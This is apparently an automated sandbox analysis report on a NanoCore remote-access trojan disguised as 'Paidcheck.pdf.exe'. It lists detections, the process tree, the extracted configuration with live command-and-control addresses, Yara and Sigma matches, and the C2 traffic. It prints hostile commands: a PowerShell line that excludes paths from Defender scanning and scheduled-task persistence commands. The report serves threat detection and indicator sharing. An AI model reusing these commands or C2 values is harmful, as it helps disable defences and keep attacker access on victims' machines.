
Windows Analysis Report Paidcheck.pdf.exe

Overview

General Information

Sample Name: Paidcheck.pdf.exe
Analysis ID: 452385
MD5: ce32e8605adb6c9bb2dcee69fe887b46
SHA1: 2ace1fb1e3523768003b61a4a79193214ffafed9
SHA256: 7e22f7f21e8798805234be7ac26bad65c1edecb55b051343e0933a68041ce073
Tags: exe, NanoCore, RAT

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • Paidcheck.pdf.exe (PID: 4608 cmdline: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' MD5: CE32E8605ADB6C9BB2DCEE69FE887B46)
    • wscript.exe (PID: 1968 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • powershell.exe (PID: 748 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 2308 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • schtasks.exe (PID: 5636 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5848 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RegAsm.exe (PID: 5432 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 496 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 4300 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "bcd083ef-bf90-4541-bf76-579f377e", "Group": "5g", "Domain1": "217.138.212.57", "Domain2": "annapro.linkpc.net", "Port": 2018, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Author: Joe Security
Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Author: Florian Roth
  • 0x59eb:$x1: NanoCore.ClientPluginHost
  • 0x5b48:$x2: IClientNetworkHost
Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Author: Florian Roth
  • 0x59eb:$x2: NanoCore.ClientPluginHost
  • 0x6941:$s3: PipeExists
  • 0x5be1:$s4: PipeCreated
  • 0x5a05:$s5: IClientLoggingHost
Source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Author: Joe Security
Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Author: Florian Roth
  • 0x39eb:$x1: NanoCore.ClientPluginHost
  • 0x3a24:$x2: IClientNetworkHost
44 entries in total (list truncated)

Unpacked PEs

Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack, Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Author: Florian Roth
  • 0x16e3:$x1: NanoCore.ClientPluginHost
  • 0x171c:$x2: IClientNetworkHost
Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack, Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Author: Florian Roth
  • 0x16e3:$x2: NanoCore.ClientPluginHost
  • 0x1800:$s4: PipeCreated
  • 0x16fd:$s5: IClientLoggingHost
Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack, Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Author: Florian Roth
  • 0x39eb:$x1: NanoCore.ClientPluginHost
  • 0x3a24:$x2: IClientNetworkHost
Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack, Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Author: Florian Roth
  • 0x39eb:$x2: NanoCore.ClientPluginHost
  • 0x3b36:$s4: PipeCreated
  • 0x3a05:$s5: IClientLoggingHost
Source: 10.2.RegAsm.exe.6540000.24.raw.unpack, Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Author: Florian Roth
  • 0x4bbb:$x1: NanoCore.ClientPluginHost
  • 0x4be5:$x2: IClientNetworkHost
148 entries in total (list truncated)

Sigma Overview

AV Detection:

Sigma detected: NanoCore
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

System Summary:

Sigma detected: Suspicious Process Start Without DLL
Source: Process started, Author: Florian Roth, Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308
Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process started, Author: Florian Roth, Max Altgelt, Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , ProcessId: 1968
Sigma detected: WScript or CScript Dropper
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community, Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , ProcessId: 1968
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe', CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs' , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 1968, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe', ProcessId: 748
Sigma detected: Possible Applocker Bypass
Source: Process started, Author: juju4, Data: Command: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ParentCommandLine: 'C:\Users\user\Desktop\Paidcheck.pdf.exe' , ParentImage: C:\Users\user\Desktop\Paidcheck.pdf.exe, ParentProcessId: 4608, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308

Stealing of Sensitive Information:

Sigma detected: NanoCore
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Remote Access Functionality:

Sigma detected: NanoCore
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegAsm.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Paidcheck.pdf.exe, Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe, Avira: detection malicious, Label: HEUR/AGEN.1118541
Found malware configuration
Source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "bcd083ef-bf90-4541-bf76-579f377e", "Group": "5g", "Domain1": "217.138.212.57", "Domain2": "annapro.linkpc.net", "Port": 2018, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe, ReversingLabs: Detection: 32%
Yara detected Nanocore RAT
Source: Yara match, File source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Paidcheck.pdf.exe, Joe Sandbox ML: detected
Source: 10.2.RegAsm.exe.5f60000.23.unpack, Avira: Label: TR/NanoCore.fadte
Source: 10.2.RegAsm.exe.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: Paidcheck.pdf.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Paidcheck.pdf.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RegAsm.pdb source: dhcpmon.exe, RegAsm.exe.0.dr
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp, RegAsm.exe, 00000011.00000002.325398042.0000000000CA2000.00000002.00020000.sdmp, dhcpmon.exe, 00000013.00000000.322931989.00000000002A2000.00000002.00020000.sdmp, dhcpmon.exe, 00000015.00000000.334603613.00000000008A2000.00000002.00020000.sdmp, RegAsm.exe.0.dr
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe, Code function: 4x nop then lea esp, dword ptr [ebp-08h]

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49704 -> 217.138.212.57:2018
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: annapro.linkpc.net
Source: Malware configuration extractor, URLs: 217.138.212.57
Source: global traffic, TCP traffic: 192.168.2.3:49704 -> 217.138.212.57:2018
Source: Joe Sandbox View, ASN Name: M247GB M247GB
Source: unknown, TCP traffic detected without corresponding DNS query: 217.138.212.57 (this entry appears 50 times in the original report)
Source: powershell.exe, 0000000B.00000003.376733884.0000000009675000.00000004.00000001.sdmp, String found in binary or memory: http://crl.micr
Source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp, String found in binary or memory: http://crl.microso
Source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmp, String found in binary or memory: http://crl.microsofX
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: RegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, String found in binary or memory: http://google.com
Source: Paidcheck.pdf.exe, 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
